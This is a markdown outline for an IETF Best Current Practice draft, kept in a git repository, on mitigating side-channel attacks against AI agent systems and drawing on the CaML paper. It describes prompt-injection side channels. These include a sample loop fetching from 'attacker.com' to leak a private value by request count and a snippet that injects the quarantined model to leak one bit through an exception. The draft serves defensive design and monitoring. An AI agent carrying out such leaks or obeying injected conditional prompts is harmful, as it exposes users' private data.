Files
ietf-draft-analyzer/data/reports/draft-proposals/camel-inspired/06-side-channel-mitigation.md
Christian Nennemann 5ec7410b89 feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add full proposal system: DB schema (proposals + proposal_gaps tables),
CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new.
The new page merges AI intake (paste URL/text → Haiku generates multiple
proposals auto-linked to gaps) with manual form entry. Generated proposals
are clickable cards that fill the editor below for refinement.

Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes
CaML-inspired draft proposals from arXiv:2503.18813 analysis.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-09 03:15:11 +01:00

10 KiB
Raw Permalink Blame History

title, draft_name, intended_wg, status, gaps_addressed, camel_sections, document_type, date
title draft_name intended_wg status gaps_addressed camel_sections document_type date
Side-Channel Mitigation Framework for AI Agent Interactions draft-nennemann-ai-agent-side-channels-00 SECDISPATCH (BCP) outline
89
93
7
BCP (Best Current Practice) 2026-03-09

Side-Channel Mitigation Framework for AI Agent Interactions

1. Problem Statement

Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — side-channel attacks can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

  1. External resource inference: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
  2. Exception-based bit leaking: an adversary triggers conditional exceptions that reveal one bit of private data per exception
  3. Timing side-channels: an adversary infers private values from execution timing differences

These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.

This document is a Best Current Practice (BCP) guide for mitigating side-channel risks in AI agent systems.

2. Scope

This document provides:

  1. A taxonomy of side-channel risks specific to AI agent systems
  2. Mitigation strategies for each risk category
  3. Tool API design guidelines that minimize side-channel exposure
  4. Monitoring patterns for detecting side-channel exploitation
  5. STRICT vs. NORMAL mode recommendations

3. Side-Channel Taxonomy

3.1 External Resource Inference

Attack: Agent code iterates over a private value (e.g., for i in range(private_var): fetch("attacker.com/cat.jpg")). The attacker counts requests to infer the private value.

CaML context: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, fetch() inside the loop inherits the dependency on private_var and policies can block it.

Bandwidth: up to log₂(max_value) bits per interaction (or more with range-based inference).

Attacker's Server
     │
     │  GET /cat.jpg  ×10  ← private_var = 10
     │  GET /cat.jpg  ×20  ← private_var = 20
     │
     └── attacker infers private_var by counting requests

3.2 Exception-Based Bit Leaking

Attack: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.

CaML context: The Q-LLM can be influenced to return a value that causes an IndexError (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).

# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception

Bandwidth: 1 bit per exception (was the subsequent action observed or not?).

3.3 Timing Side-Channels

Attack: Agent execution time depends on private data. For example, if time.sleep(private_var) is possible, the attacker measures response time.

CaML context: CaML's restricted Python subset doesn't include time, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

Bandwidth: depends on timing precision — generally low but non-zero.

3.4 Agent-Specific Side Channels (Beyond CaML)

Channel Attack Vector Bandwidth
Token usage Private data influences response length → observable token count Medium
Tool selection pattern Which tools are called reveals information about private data Medium
Error message content Error details leak through supposedly sanitized channels High
Model confidence Probability distributions in structured output leak information Low
Resource consumption CPU/memory usage patterns depend on private data Low

4. Mitigation Strategies

4.1 STRICT Mode Execution

Recommendation: Use STRICT mode for all security-sensitive agent operations.

In STRICT mode:

  • All statements inside if/for/while blocks inherit dependencies from the condition/iterator
  • This means a fetch() inside for i in range(private_var) will have private_var in its dependency graph
  • Security policies can detect and block the side-channel

Trade-off: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.

4.2 Exception Handling Hardening

Recommendation: Use error-value types instead of exceptions for data-dependent operations.

Exceptions create side channels because they halt execution. Instead:

# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except:
    pass  # attacker observes: was email sent?

# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way

Agent frameworks SHOULD:

  • Use Result/Either types instead of exceptions for Processor outputs
  • Ensure both success and failure paths make the same external observations
  • Redact exception messages before they reach the Planner

4.3 Constant-Pattern Tool Calls

Recommendation: Where feasible, make tool call patterns independent of private data.

  • Avoid data-dependent loops that make external calls
  • Use batch operations instead of per-item calls
  • Pad tool call sequences to fixed lengths for sensitive operations

4.4 External Request Restrictions

Recommendation: Restrict which external endpoints agents can contact.

  • Allowlist approved external domains
  • Proxy all external requests through a controlled gateway
  • Rate-limit external requests per agent session
  • Log all external requests for anomaly detection

5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

5.1 Do

  • Return consistent response structures regardless of input
  • Use fixed-size responses where possible
  • Include provenance metadata in all outputs
  • Document trust levels of output fields (which are public, which are private)

5.2 Don't

  • Return variable-length arrays that depend on private data in observable ways
  • Include internal identifiers in error messages
  • Use response timing that depends on input sensitivity
  • Expose iteration counts or batch sizes in responses

5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}

6. Monitoring Patterns

6.1 Anomaly Detection Signals

Signal Potential Attack Action
Repeated requests to same external URL External resource inference Rate limit + alert
Unusually high exception rate Exception-based bit leaking Halt + review
Execution time variance > threshold Timing side-channel Log + investigate
Tool call patterns differ from plan Control flow manipulation Emergency halt
Same agent repeatedly hitting policy denials Probing attack Throttle + alert

6.2 Monitoring Architecture

Agent Execution
     │
     ├──► Side-Channel Monitor
     │       ├── Request pattern analyzer
     │       ├── Exception rate tracker
     │       ├── Timing variance detector
     │       └── Tool call pattern validator
     │              │
     │              ▼
     │         Alert / Halt Decision
     │
     ▼
Normal execution continues (if no anomaly)

7. Relationship to Other Drafts

Draft Side-Channel Relevance
Draft 1 (Capabilities) Capability metadata enables policy checks that detect side channels
Draft 2 (Flow Integrity) STRICT mode DFG tracking is the primary side-channel mitigation
Draft 3 (Provenance) Provenance metadata itself can be a side channel — needs protection
Draft 4 (Policy Federation) Policy denial patterns across organizations can leak info
Draft 5 (Execution Model) Isolation architecture is the first line of defense

8. Security Considerations

This entire document is about security. Key meta-considerations:

  • Side-channel mitigation is defense in depth — no single measure eliminates all channels
  • The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
  • New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
  • Side-channel monitoring itself can create privacy issues (logging all agent interactions)

9. Open Questions

  1. Formal analysis: can we formally prove bounds on information leakage for a given agent configuration?
  2. Adaptive adversaries: as mitigations are deployed, attackers will find new channels. How to stay ahead?
  3. Overhead budget: what is the acceptable performance overhead for side-channel mitigation?
  4. Multi-agent amplification: do side channels in multi-agent systems compose (leak more than single-agent)?

10. References

  • Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
  • Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
  • Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
  • Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.